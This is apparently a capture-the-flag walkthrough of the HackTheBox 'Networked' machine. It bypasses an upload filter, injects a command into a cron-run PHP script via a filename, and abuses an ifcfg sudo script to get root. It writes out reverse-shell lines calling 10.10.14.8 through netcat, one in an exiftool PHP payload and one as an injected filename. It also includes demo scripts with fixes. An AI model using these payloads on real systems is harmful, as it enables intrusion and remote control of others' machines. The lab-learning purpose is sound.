HackTheBox “Networked” Walkthrough
Networked is an easy Linux machine on HackTheBox. Initial access came through a weakly validated file-upload form; two scripts that run with elevated rights on the box (one from guly's cron, one runnable as root via sudo) then took us from the web-server user to root.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to run a full port scan and enumerate the services behind the open ports:
Visit the target at port 80.
Check the page source.
It mentions an upload page and a gallery. To find hidden files or directories, let’s run a directory brute-force with Dirsearch.
Visit upload.php.
It confirms there is a file-upload form; let’s check photos.php.
It looks like the gallery for uploaded photos; let’s visit the backup directory.
Download and extract the archive backup.tar.
The archive contains the site’s source code.
Let’s have a look at the content of upload.php.
└─$ cat upload.php
<?php
require '/var/www/html/lib.php';
define("UPLOAD_DIR", "/var/www/html/uploads/");
if( isset($_POST['submit']) ) {
if (!empty($_FILES["myFile"])) {
$myFile = $_FILES["myFile"];
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '<pre>Invalid image file.</pre>';
displayform();
// no exit here: a file that fails the type or size check still reaches the code below
}
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "<p>An error occurred.</p>";
displayform();
exit;
}
//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
// suffix match only: "shell.php.jpg" ends in ".jpg" and is accepted
foreach ($validext as $vext) {
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
$valid = true;
}
}
if (!($valid)) {
echo "<p>Invalid image file</p>";
displayform();
exit;
}
// stored as <client IP, dots replaced by underscores>.<$ext>; $ext comes from getnameUpload() in lib.php (not shown)
$name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
$success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
if (!$success) {
echo "<p>Unable to save file.</p>";
exit;
}
echo "<p>file uploaded, refresh gallery</p>";
// set proper permissions on the new file
chmod(UPLOAD_DIR . $name, 0644);
}
} else {
displayform();
}
?>
The upload handler in upload.php accepts a file only if its name ends in .jpg, .png, .gif or .jpeg, its size is below 60000 bytes, and check_file_type() (defined in lib.php, not shown here; it inspects the file’s MIME type rather than its name) is happy with the content. Two details matter: the extension test is a suffix match only, and the stored filename keeps $ext as returned by getnameUpload(). A name such as shell.php.jpg therefore passes the check and is saved with .php.jpg at the end, which Apache’s mod_php handler on this box still executes as PHP.
The plan: take the machine’s card image, shrink it below 60000 bytes, inject a PHP reverse-shell payload into its metadata with exiftool (so the file is still a valid JPEG for the MIME check), then rename it so the name ends in .php.jpg.
exiftool -DocumentName='<?php system("nc 10.10.14.8 4343 -e /bin/sh"); ?>' shell.jpg
Next, start a listener on port 4343.
Rename shell.jpg to shell.php.jpg and upload it.
Browse to photos.php.
When the gallery loads, the browser requests the uploaded file, Apache executes it as PHP, and we get a connection on our listener.
Let’s have a look around.
Notably, according to crontab.guly, /home/guly/check_attack.php is executed every 3 minutes as guly.
Let’s have a look at “/home/guly/check_attack.php”.
sh-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>
The line exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); is the problem. $path is the uploads directory and $value is the name of the file that just failed check_ip() (defined in lib.php, not shown; a filename that is not a dotted IP address fails it), and both are interpolated into a shell command string without any quoting or escaping. A file whose name starts with a semicolon (;) therefore terminates the rm command, and the rest of the name runs as a second command, as guly, the next time cron runs the script. Since such a name does not look like an IP address, it also guarantees the "attack!" branch is taken. This is enough to run a reverse shell.
Let’s first start a listener.
From the apache shell we create a file in /var/www/html/uploads whose name is “; nc 10.10.14.8 4343 -c bash” (for example with touch "/var/www/html/uploads/; nc 10.10.14.8 4343 -c bash") and wait up to three minutes for cron.
On our listener we get a shell as guly.
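The following is an added example, not part of the original write-up: it rebuilds the exec() line from check_attack.php as a shell function, drops a file with an injected name into a scratch directory, and shows that the shell runs the name rather than removing the file, followed by the quoted form that actually removes it. The directory and filename are constructed for the demo; nohup, the redirections and the trailing & are dropped so the injected command’s output can be seen.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): the exec() line from
# check_attack.php rebuilt in shell against a scratch directory. nohup, the
# redirections and the trailing & are dropped so the injected command's
# output is visible; the shell parsing of the filename is otherwise identical.

# Vulnerable: the filename is spliced into a command string that a shell parses.
# A name beginning with ";" ends the rm command and starts a second one.
vulnerable_rm() {            # vulnerable_rm <dir/> <filename>
  sh -c "rm -f $1$2" 2>/dev/null
}

# Fixed: pass the path as a single argument, after "--" so a name beginning
# with "-" cannot turn into an option. The PHP equivalent is
#   exec("/bin/rm -f -- " . escapeshellarg($path . $value));
# or simply unlink($path . $value), which involves no shell at all.
safe_rm() {                  # safe_rm <dir/> <filename>
  rm -f -- "$1$2"
}

demo() {
  local dir name
  dir=$(mktemp -d)/                         # stands in for /var/www/html/uploads/
  name='; echo INJECTED'                    # on the box: '; nc 10.10.14.8 4343 -c bash'
  : > "$dir$name"                           # what the apache user drops into uploads/
  echo "vulnerable_rm output: $(vulnerable_rm "$dir" "$name")"
  if [ -e "$dir$name" ]; then
    echo "file still there: the shell ran echo instead of removing the file"
  fi
  safe_rm "$dir" "$name"
  if [ ! -e "$dir$name" ]; then
    echo "safe_rm removed the file"
  fi
  rm -rf "$dir"
}
demo
```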
Let’s list the privileges granted to the user.
Guly can run /usr/local/sbin/changename.sh as root via sudo without a password.
Let’s have a look at “/usr/local/sbin/changename.sh”.
[guly@networked ~]$ ls -lah /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul 8 2019 /usr/local/sbin/changename.sh
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
The script writes a fresh ifcfg-guly file, then prompts for the NAME, PROXY_METHOD, BROWSER_ONLY and BOOTPROTO values of the interface, validates each answer against the regexp, appends it to the file as VAR=value and finally brings the interface up with /sbin/ifup.
This is a known weakness of the CentOS network-scripts: ifup sources the ifcfg-* file as a shell script, so a value containing a space, which the regexp explicitly allows, is parsed as NAME=word followed by a command, and that command runs as root.
We run the script with sudo and, at the NAME prompt, enter a word, a space and /bin/bash; when ifup sources the file we land in a root bash shell.
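Added example (not from the original post): the regexp and the sourcing step of changename.sh reproduced against a temporary file, showing that a NAME value containing a space passes the filter and is then executed when the file is sourced. The value “guly printf pwned” is a harmless stand-in for “guly /bin/bash”; on the box the sourcing is done by /sbin/ifup as root. A tighter filter that rejects spaces and slashes is shown alongside.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): why a space in the NAME answer
# to changename.sh yields code execution. The script validates each answer
# with a regexp that allows spaces, writes it to the ifcfg file as NAME=value,
# and ifup then sources that file as a shell script. Everything below runs in
# a scratch file as the current user; on the box the same sourcing runs as root.

IFCFG_RE='^[a-zA-Z0-9_\ /-]+$'         # the regexp from changename.sh, verbatim

passes_filter() {            # the script's check, done with grep -E instead of [[ =~ ]]
  printf '%s\n' "$1" | grep -Eq "$IFCFG_RE"
}

hardened_filter() {          # no space, no slash: the value can only ever be one shell word
  printf '%s\n' "$1" | grep -Eq '^[a-zA-Z0-9_-]+$'
}

write_ifcfg() {              # mimics: echo NAME=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
  printf 'NAME=%s\n' "$2" > "$1"
}

source_ifcfg() {             # mimics the step in ifup that sources the file; prints whatever runs
  ( . "$1" )
}

demo() {
  local f answer
  f=$(mktemp)
  answer='guly printf pwned'             # on the box: 'guly /bin/bash' at the NAME prompt
  if passes_filter "$answer"; then
    echo "changename.sh accepts '$answer'"
  fi
  write_ifcfg "$f" "$answer"
  # the file now holds "NAME=guly printf pwned": a variable assignment prefixed to a command
  echo "sourcing the file runs: $(source_ifcfg "$f")"
  if ! hardened_filter "$answer"; then
    echo "hardened filter rejects it"
  fi
  rm -f "$f"
}
demo
```

The underlying problem is not the regexp but the design: user input is written into a file that another privileged component evaluates as code. Tightening the character class removes this particular trigger, but the robust fix is to not let sudo expose a script that writes attacker-controlled values into files that ifup sources.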
Cheers.